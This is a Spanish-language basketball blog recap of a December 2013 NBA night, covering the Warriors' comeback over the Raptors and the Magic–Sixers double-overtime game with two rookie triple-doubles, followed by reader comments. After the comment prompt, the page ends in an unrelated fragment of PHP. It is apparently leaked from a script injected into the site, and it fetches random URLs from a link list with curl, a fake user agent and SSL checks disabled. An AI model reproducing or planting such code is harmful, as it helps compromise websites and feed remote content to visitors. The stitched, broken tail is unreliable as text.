La Crónica: Locura en el Oracle Arena

04 de December de 2013 por TheDeerHunter

Esperábamos jornada de transición. Duelos poco atractivos a priori que nos inspiraban cierta pereza. En ocasiones sucede que, cuando menos te lo esperas, es cuando surge la mejor magia de esta liga.

Comenzamos por el final. La guinda a una jornada extraordinaria. La genética de los Warriors es históricamente especial. Parece que allí se desprecia el concepto de victoria “a secas”, apreciándose el “cómo” por encima de cualquier otra consideración. La salsa de la vida son las emociones fuertes. Cuanto más improbable sea la hazaña mucho mejor.
Anoche, por ejemplo, perdían ante los Raptors de 27 bien entrado el tercer cuarto lo que sería motivo razonable para que aparecieran pitos y pañuelos en cualquier pabellón, pero en la Bahía de Oakland es una ocasión inmejorable para disfrutar. El parcial a partir de ese momento fue de 64 a 28 para Warriors, con un 10 de 20 en triples, muchos de ellos en plan “soy Stephen Curry y cuando tengo un rato tonto te destrozo hagas lo que hagas”. Extraordinario Jermaine O’Neal jugando el último cuarto al completo y el resto tocando la guitarra a su alrededor en medio del delirio del respetable. Ante ellos unos Raptors lógicamente acongojados. Estos lo que tienen es tendencia genética a salir como víctima en la foto de las efemérides. Cada uno lo suyo (103-112). 

La jornada había empezado con un pasote de partido con dos prórrogas entre Magic y Sixers. La primera vez en toda la historia que dos rookies se marcan un triple-doble simultáneamente, Oladipo y Carter-Williams. Además los 43 puntazos de Arron Afflalo y los 33 de Glen Davis que no iban a servir para ganar. Demasiada ventaja los 56 rebotes frente a 34 a favor de Philadelphia. Se notó la baja de Vucevic (125-126).

En Miami los campeones dieron por finalizada su racha ante Detroit, que se aprovechaba de la baja de Dwyane Wade. Sólo LeBron y Beasley dieron la cara por los locales, mientras los Pistons disfrutaron de 7 hombres en dobles dígitos (más Jerebko rondándolos) y a pesar todo hubo partido hasta los últimos minutos. El mejor de los Pistons fue Kyle Singler que estuvo muy fino desde el banco (107-97).

Por su parte, los Thunder también estuvieron a punto de tropezar en Sacramento. No fue la noche de Westbrook que le dio la vida a Isiah Thomas a base de pérdidas. Éste la tuvo para empatar peró falló en el tiro clave (97-95).

Terminando, el resto de encuentros entraron dentro de la lógica sin demasiado que destacar. Los Celtics ganaron a Bucks con otro gran partido de Jordan Crawford (y récord de triples para el equipo esta temporada, 100-108); Mozgov se comió a Brook Lopez igual que su equipo a los Nets (111-87); partidazo del juego interior en la victoria de Grizzlies ante Suns (91-110), y excelente versión de Dirk Nowitzki endosándo 14 puntos en el último cuarto a Charlotte para ganar y volver a meter a los Mavs en zona playoffs (82-89).

PREMIOS

MVP: Hacía tiempo que lo rondaba y ayer finalmente lo consiguió. Michael Carter-Williams acabó el partido con el primer triple doble de su carrera (27 puntos, 12 rebotes y 10 asistencias). Stephen Curry sigue a un nivel altísimo desde la lesión de Iguodala como demuestran los 27 puntos, 10 asistencias y 5 robos que consiguió anoche ante los Raptors.

Rookie: Victor Oladipo también consiguió un triple-doble aunque tuvo la mala suerte de jugar en el equipo perdedor. Él acabó con 26 puntos, 10 rebotes y 10 asistencias.

Sorpresa: 20 rebotes capturó Timofey Mozgov ante Lopez, Blatche, Evans y compañía. Y no sólo eso sinó que además anotó 17 puntos completando el mejor partido de su carrera. Y en Memphis faltaron Marc Gasol y Zach Randolph pero no pasa nada. 14 puntos y 12 de Kosta Koufos, 21 puntos y 12 rebotes de Ed Davis y 23 puntos y 9 rebotes de Jon Leuer. ¡Toma juego interior!

Decepción: Mike Miller se fue para casa con 0 puntos tras fallar los 4 tiros que intentó. Brook Lopez sólo fue capaz de capturar 2 rebotes, los que le dejó Mozgov.

Esfuerzo en vano: 76 puntos anotaron entre Arron Afflalo y Glen Davis con un porcentaje de acierto del 56%. Ellos 2 anotaron los últimos 17 puntos de Orlando en el tiempo regular que llevaron el partido a la primera prórroga.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Les cuesta muchísimo a los Warriors las victorias… no sé yo si entrarán en PO

      Citar

  2. TheDeerHunter dice:
    #2

    El listón está muy alto y ellos están padeciendo problemas físicos, pero yo no me preocuparía demasiado. Me parece impensable que no entren en condiciones normales.

      Citar

  3. Esteban dice:
    #3

    algunas consideraciones

    tremendo el Thunder, Jeramy Lamb y Reggie Jackson juntos desde el banco hacen olvidar a Haden a un precio mucho mas bajo

    Los Bucks ya son el peor equipo de la liga, y deben empezar a recolectar rondas, veo jugadores validos con buenos contratos para traspasar, Neal, Ridnur y hasta Mayo y Pachulia, a vender todo y empezar de 0

    Drummond y otros 18 rebotes, en la porra lo puse como maximo reboteador de la competicion, a ver si Howard me da el punto

    Los de Afflalo y Glen Davis no se explica en el Magic, ambos valiosiimos jugadores con excelentes contratos para su rendimiento ya deberian ser traspasados, a mi juicio, el precio de ambos esta por las nubes

    por ultimo, Beasley sumando importancia en su rol secundario, para el final de la temporada, estoy seguro que hablaremos de el como uno de los mejores sexto hombre

      Citar

  4. Blade Petrovic dice:
    #4

    Pâra mí el MIP ya tiene dueño claro, Evan Turner. El Sixer se esta metiendo un temporadón, creo que casi doblando los dígitos en anotación del año anterior.Ojito que es FA este año( si Deng se va de los Bulls lo veo ahí)

      Citar

  5. rumbero dice:
    #5

    Blade Petrovic:
    Pâra mí el MIP ya tiene dueño claro, Evan Turner. El Sixer se esta metiendo un temporadón, creo que casi doblando los dígitos en anotación del año anterior.Ojito que es FA este año( si Deng se va de los Bulls lo veo ahí)

    Pues yo había perdido casi toda esperanza con el chaval, pero la verdad es lo está haciendo muy bien hasta el momento. Esperemos que no sea del club del cazo mix eso si…

    Y aprovechar para felicitar a Rudy Gay que por primera vez esta temporada ha acabado un partido tirando al menos con un 50% y a Jason Kidd que ha tomado la decisión de echar a Lawrence Frank del banquillo y esta misma madrugada ya se han empezado a ver los resultados. Sólo han palmado de 24

      Citar

  6. Jose Luis dice:
    #6

    Ole Kidd!

      Citar

  7. Denise dice:
    #7

    Tal y como están respondiendo Ed Davis, Koufos y Leuer ante las bajas de Randolph y Marc, creo que una vez vuelva el español, los ositos deberían plantearse el traspasar a Randolph que es Player Option por un alero ,
    No sé, podrían intentar un Zach por Gallinari e Hickson, a Denver le vendría bien un tio con calidad por dentro.

    Los GSW deben entrar en el Oeste si o si por muy duro que esté. Todo lo demas sería un fracaso.

    Los números de Turner son en parte gracias a jugar en estos 76ers sin ninguna presión y donde tiene toda la libertad del mundo para tirar, en un equipo con aspiraciones mas serias no estaría en estos números. Ó dicho de otra forma, Drummond que para mi es el claro ejemplo de MIP promedia actualmente 13 puntos con 9 tiros, estuviese en los 76ers, tiraría minimo 15 veces, jugaría mas de los 32 minutos que juega y podría estar promediando un 20-15 con la gorra. Tambien Hawes, Wroten ó Anderosn está haciendo numerazos y en otros equipos apenas promediarian 15 minutos y gracias.

    @Esteban: Afflalo y Davis probablemente serán traspasados en febrero que es cuando mas necesidad tienen aquellos contenders que ven que le faltan piezas para subir un escalón y pueden ofrecerte mas por ellos.

    Tal y como están los Knicks , los Nets (hasta que despidan a Kidd) y los Bulls sin Rose, los Pistons deberían convertirse en la tercera fuerza del Este

      Citar

  8. Jose Luis dice:
    #8

    Yo creo que los Hawks quedarán por encima de los Pistons, salvo que hagan un traspaso por un alero o escolta que tire triples.

      Citar

  9. Denise dice:
    #9

    Jose Luis:
    Yo creo que los Hawks quedarán por encima de los Pistons, salvo que hagan un traspaso por un alero o escolta que tire triples.

    A mi los Hawks no me transmiten mucho. Millsap está muy por debajo de lo que esperaba de él, en las alas no tienen un solo jugador con facilidades para crear su tiro, y hay gente como Jenkins, Brand ó Ayon a un nivel bajisimo. Y otro bluff está siendo Schroeder, que por cierto lo acaban de mandar a la D-League.

    Queda mucho aun, y la logica de que los Nets y los Knicks queden entre los 6 primeros creo que se cumplirá.

    Por cierto, alguien aun tiene dudas de quien fue el ganador del dichoso trade de DH? Afflalo, Vucevic, Harkless, y 3 primeras rondas que aun nos quedan por cobrar en los proximos 4 años.
    Por cierto, alguien podría explicarme exactamente el funcionamiento de esta primera ronda que tienen los Magic el año que viene. ¿Quien le da la ronda, los Nuggets ó los Knicks?

    2014 – Owed first-rounder-rounder from Denver Nuggets (Dwight Howard). The Magic get the lesser first-rounder, which could be from New York Knicks (Carmelo Anthony).

      Citar

  10. Ruxixón dice:
    #10

    Si no me equivoco Denise,Orlando cogería la ronda menos favorable para sus intereses,es decir,si fuera hoy el draft,tendría el pick de Nuggets (pick 23),y ojo,Denver recibiría la ronda de NYK,es decir,un señor pick 2.

      Citar

  11. sempren dice:
    #11

    En el Oeste, mis favoritos son los que están ahora mismo en PO, cambiando a Mavs por Grizzlies, aunque cualquiera de los dos equipos tienen carencias importantes. Los otros posibles perdedores serían los Nuggets, mal que me pese, tienen un equipo “raro”, pero que ahora mismo está funcionando muy bien, y eso que perdieron a Gallinari y a McGee (aunque sobre JaVale no se sabe si es para bien o para mal xD)

      Citar

  12. Denise dice:
    #12

    Ruxixón: Si no me equivoco Denise,Orlando cogería la ronda menos favorable para sus intereses,es decir,si fuera hoy el draft,tendría el pick de Nuggets (pick 23),y ojo,Denver recibiría la ronda de NYK,es decir,un señor pick 2.

    Gracias crack, fenomeno entonces, no creo que Denver se clasifique para PO y los Knicks uff…un top 16 creo que podriamos pillar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>